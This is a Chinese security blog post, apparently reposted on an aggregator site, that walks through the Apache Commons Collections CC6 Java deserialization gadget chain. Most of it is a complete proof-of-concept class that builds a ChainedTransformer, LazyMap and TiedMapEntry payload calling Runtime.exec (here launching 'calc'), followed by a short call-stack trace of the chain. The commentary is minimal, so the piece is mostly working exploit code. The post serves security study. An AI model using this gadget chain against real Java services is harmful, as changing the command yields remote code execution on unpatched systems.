热门标签
热门文章
- 1高手过招, 为什么 Redis Cluster 是16384个槽位?_redis16384个槽
- 2android约束布局ConstraintLayout_constraintlayout 比例
- 3oracle常见单词_数据库中常用的英文单词
- 4Python与Excel的完美结合:操作技巧与自动化应用
- 5完全卸载Android Studio的方法_android studio卸载
- 6【前端Vue3】——JQuery知识点总结(超详细)
- 7(openstack搭建)openstack云平台部署-详细完整教程_openstack部署
- 8往届生和应届生、同等学历复试材料有什么区别?
- 9文本识别综述 <软件学报_王建新等、中国图象图形学报_刘崇宇等>
- 10探索FTP:原理、实践与安全优化_ftp s3存储
当前位置: article > 正文
『Java安全』反序列化-CC6反序列化漏洞POP链分析_ysoserial CommonsCollections6 PoC分析_cc6漏洞攻击
作者:羊村懒王 | 2024-06-09 15:51:40
赞
踩
cc6漏洞攻击
前言
CC6触发TiedMapEntry.hashcode(),非常简单因此只做记录
代码复现
工具类
反序列化:
UnserializePacked.Unserialize.java
package UnserializePacked; import java.io.*; public class Unserialize { public static void unserialize(Object obj) throws Exception{ File f = File.createTempFile("temp", "out"); ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(f)); oos.writeObject(obj); oos.close(); ObjectInputStream ois = new ObjectInputStream(new FileInputStream(f)); Object o = ois.readObject(); System.out.println(o); ois.close(); f.deleteOnExit(); } }
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
PoC
package cc.cc6; import UnserializePacked.Unserialize; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; import org.apache.commons.collections.keyvalue.TiedMapEntry; import org.apache.commons.collections.map.LazyMap; import java.util.HashMap; import java.util.Map; public class PoC { public static void main(String[] args) throws Exception { ChainedTransformer chainedTransformer = new ChainedTransformer( new Transformer[]{ new ConstantTransformer(Runtime.class), new InvokerTransformer( "getMethod", new Class[]{ String.class, Class[].class }, new Object[]{ "getRuntime", new Class[0] } ), new InvokerTransformer( "invoke", new Class[]{ Object.class, Object[].class }, new Object[]{ null, new Object[0] } ), new InvokerTransformer( "exec", new Class[]{ String.class }, new Object[]{ "calc" } ) } ); Map lazyMap = LazyMap.decorate(new HashMap(), chainedTransformer); TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "a"); HashMap hashMap = new HashMap(); hashMap.put(tiedMapEntry, 1); Unserialize.unserialize(hashMap); } }
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
代码审计 | 原理分析
TiedMapEntry.hashCode()调用toString()方法
POP链
transform:121, ChainedTransformer (org.apache.commons.collections.functors)
get:151, LazyMap (org.apache.commons.collections.map)
getValue:73, TiedMapEntry (org.apache.commons.collections.keyvalue)
hashCode:120, TiedMapEntry (org.apache.commons.collections.keyvalue)
hash:338, HashMap (java.util)
put:611, HashMap (java.util)
main:57, PoC (cc.cc6)
- 1
- 2
- 3
- 4
- 5
- 6
- 7
完
欢迎关注我的CSDN博客 :@Ho1aAs
版权属于:Ho1aAs
本文链接:https://blog.csdn.net/Xxy605/article/details/123453096
版权声明:本文为原创,转载时须注明出处及本声明
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/羊村懒王/article/detail/694793
推荐阅读
- 第一关:字符串基本使用 - 自我介绍
[详细] -->赞
踩
相关标签
